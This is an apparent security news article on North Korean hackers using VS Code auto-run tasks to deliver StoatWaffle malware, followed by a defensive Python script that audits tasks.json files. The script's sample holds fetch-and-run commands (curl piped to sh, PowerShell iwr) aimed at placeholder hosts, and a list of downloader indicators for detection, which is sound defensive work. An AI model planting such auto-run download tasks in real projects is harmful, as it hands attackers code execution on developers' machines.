North Korean Hackers Exploit VS Code Auto-Run Tasks to Deploy StoatWaffle Malware
In a sophisticated cyber espionage campaign, North Korean state-sponsored hackers, identified as the group behind the Contagious Interview campaign—also known as WaterPlum—have been observed leveraging Microsoft Visual Studio Code (VS Code) to distribute a new malware strain named StoatWaffle. This tactic, first detected in December 2025, involves manipulating VS Code’s tasks.json configuration to automatically execute malicious code upon opening any file within the project folder.
Mechanism of Attack
The attackers craft malicious VS Code projects containing a tasks.json file configured with the runOn: folderOpen option. This setting ensures that the embedded tasks execute automatically whenever the project folder is accessed in VS Code, regardless of the operating system in use. Upon activation, the task initiates a sequence of actions:
1. Payload Retrieval: The task downloads data from a web application hosted on Vercel, a cloud platform for frontend frameworks and static sites.
2. Node.js Verification: The malware checks for the presence of Node.js in the system. If absent, it downloads and installs Node.js from the official website.
3. Downloader Execution: A downloader script is executed, which periodically contacts an external server to fetch subsequent payloads.
4. Module Deployment: The final payload comprises two primary modules:
– Stealer Module: This component extracts credentials and extension data from web browsers, including Chromium-based browsers and Mozilla Firefox. On macOS systems, it also targets the iCloud Keychain database. The harvested data is then transmitted to a command-and-control (C2) server.
– Remote Access Trojan (RAT) Module: This module establishes communication with the C2 server, enabling the execution of various commands on the infected host. These commands include directory navigation, file enumeration, execution of Node.js code, file uploads, recursive directory searches, shell command execution, and self-termination of the malware.
Broader Implications and Related Campaigns
The deployment of StoatWaffle is part of a broader strategy by North Korean threat actors to infiltrate developer environments and exfiltrate sensitive information. This campaign is notable for its innovative use of legitimate development tools to facilitate malware distribution, thereby increasing the likelihood of successful infiltration.
In addition to the StoatWaffle campaign, the same threat actors have been implicated in other malicious activities targeting the open-source ecosystem:
– Malicious npm Packages: The group has been linked to the distribution of PylangGhost, a Python-based backdoor, through compromised npm packages. This marks the first instance of PylangGhost being propagated via npm, highlighting the expanding scope of their attack vectors.
– PolinRider Campaign: In this operation, the attackers implanted obfuscated JavaScript payloads in numerous public GitHub repositories. This led to the deployment of an updated version of BeaverTail, a known stealer and downloader malware associated with the Contagious Interview campaign.
– Neutralinojs Repository Compromise: The attackers compromised four repositories within the Neutralinojs GitHub organization. By gaining access to a contributor’s account with organization-level write permissions, they injected malicious JavaScript code designed to retrieve encrypted payloads from blockchain transactions, ultimately downloading and executing BeaverTail.
Recommendations for Developers
Given the increasing sophistication of these attacks, developers are urged to adopt stringent security practices:
– Exercise Caution with External Repositories: Be vigilant when cloning and opening projects from unfamiliar or untrusted sources.
– Review Configuration Files: Thoroughly inspect tasks.json (kept in the project’s .vscode folder) and other configuration files for any suspicious or unauthorized tasks before opening the project in VS Code, since a task marked runOn: folderOpen runs as soon as the folder is opened rather than when a developer chooses to execute it.
– Maintain Updated Security Software: Ensure that all security tools and software are up to date to detect and mitigate potential threats effectively.
– Limit Permissions: Restrict the execution of scripts and tasks to trusted sources and environments to minimize the risk of unauthorized code execution.
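The following audit script turns the "Review Configuration Files" recommendation into a check against the runOn: folderOpen mechanism described above. It is an added example, not code from the article or from any vendor; the SUSPICIOUS fragment list is a constructed heuristic and the sample tasks.json, including its placeholder URLs, is constructed for illustration.

```python
import json
import re
from pathlib import Path

# Heuristic fragments that mark an auto-run task as a likely downloader
# (a constructed list for this example, not an exhaustive signature set).
SUSPICIOUS = ("curl ", "wget ", "invoke-webrequest", "iwr ", "node -e",
              "powershell", "bash -c", "sh -c", "http://", "https://")
_STR = r'"(?:\\.|[^"\\])*"'  # a JSON string literal, matched first so it is never edited

def _strip_jsonc(text: str) -> str:
    """tasks.json is JSON-with-comments: drop // and /* */ comments and trailing commas."""
    keep = lambda m: m.group(0) if m.group(0).startswith('"') else ""
    text = re.sub(_STR + r"|//[^\n]*|/\*.*?\*/", keep, text, flags=re.S)
    return re.sub(_STR + r"|,(?=\s*[\]}])", keep, text)

def _cmdline(spec: dict) -> str:
    """Flatten command + args; quoted args may be {"value": ..., "quoting": ...} objects."""
    args = [a.get("value", "") if isinstance(a, dict) else a for a in spec.get("args", [])]
    return " ".join(str(x) for x in [spec.get("command", "")] + args)

def audit_tasks(text: str) -> list[dict]:
    """One finding per task that VS Code would start automatically when the folder is opened."""
    findings = []
    for task in json.loads(_strip_jsonc(text)).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        # Merge per-OS overrides so a command hidden under "windows"/"linux"/"osx" is seen too.
        cmd = " ".join([_cmdline(task)] + [_cmdline(task[k]) for k in ("windows", "linux", "osx")
                                           if isinstance(task.get(k), dict)])
        findings.append({"label": task.get("label", "<unnamed>"), "command": cmd.strip(),
                         "downloader_indicators": [s for s in SUSPICIOUS if s in cmd.lower()]})
    return findings

def audit_folder(root: str) -> list[dict]:
    """Scan every .vscode/tasks.json below root (e.g. a fresh clone) before opening it in VS Code."""
    return [{"file": str(p), **f} for p in Path(root).glob("**/.vscode/tasks.json")
            for f in audit_tasks(p.read_text(encoding="utf-8", errors="replace"))]

# Constructed sample that mimics the auto-run pattern; the URLs are placeholders, not IoCs.
SAMPLE = r'''{
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell", // comments and trailing commas are legal here
     "command": "curl -fsSL https://example.invalid/setup.sh | sh",
     "windows": {"command": "powershell", "args": ["-c", {"value": "iwr https://example.invalid/s", "quoting": "escape"}]},
     "runOptions": {"runOn": "folderOpen"},
    },
  ]
}'''
```

Call `audit_folder(path)` on a clone before opening it in VS Code and treat any finding with downloader indicators as a reason not to open the folder. Recent VS Code releases additionally gate automatic tasks behind Workspace Trust and the `task.allowAutomaticTasks` setting, which is a second control worth verifying on developer machines.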
By implementing these measures, developers can enhance their defenses against such sophisticated cyber threats and protect their systems and data from compromise.